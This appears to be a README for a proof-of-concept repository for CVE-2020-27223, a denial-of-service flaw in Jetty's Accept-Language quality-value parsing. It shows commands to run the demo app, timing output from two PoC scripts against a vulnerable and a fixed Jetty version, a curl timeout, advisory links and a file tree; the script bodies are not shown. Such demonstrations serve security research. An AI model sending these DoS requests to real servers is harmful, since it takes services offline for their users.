CVE-2020-27223 Vulnerability App & PoC# CVE-2020-27223
## Using
```
$ mvn spring-boot:run
```
### 9.4.36.v20210114
```
$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"58,557","accept_language":"aab"}
real 0m0.093s 🐇
user 0m0.006s
sys 0m0.007s
{"time_ns":"18,461,763,438","accept_language":"ahn"}
real 0m35.339s 🐢
user 0m0.006s
sys 0m0.006s
```
### 9.4.37.v20210219 (Fixed)
```
$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"36,675","accept_language":"aab"}
real 0m0.023s 🐇
user 0m0.005s
sys 0m0.007s
{"time_ns":"1,265,004","accept_language":"ahn"}
real 0m0.024s 🐇
user 0m0.006s
sys 0m0.006s
```
## PoC
```
$ ./poc/cve-2020-27223-poc2.sh
curl: (28) Operation timed out after 120000 milliseconds with 0 bytes received
real 2m0.025s
user 0m0.016s
sys 0m0.009s
```
## References
- [DOS vulnerability for Quoted Quality CSV headers · Advisory · eclipse/jetty.project](https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7)
- [Merge pull request from GHSA-m394-8rww-3jr7 · eclipse/jetty.project@10e5317](https://github.com/eclipse/jetty.project/commit/10e531756b972162eed402c44d0244f7f6b85131)
[4.0K] /data/pocs/c26d4a612f09a5f4397c8271fd6344a6390df627
├── [9.8K] mvnw
├── [6.5K] mvnw.cmd
├── [4.0K] poc
│ ├── [ 25K] cve-2020-27223-poc1.sh
│ └── [223K] cve-2020-27223-poc2.sh
├── [2.2K] pom.xml
├── [1.1K] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ └── [4.0K] cve_2020_27223
│ ├── [4.0K] controller
│ │ └── [ 923] SampleController.java
│ └── [ 315] DemoApplication.java
└── [4.0K] resources
└── [ 37] application.properties
9 directories, 9 files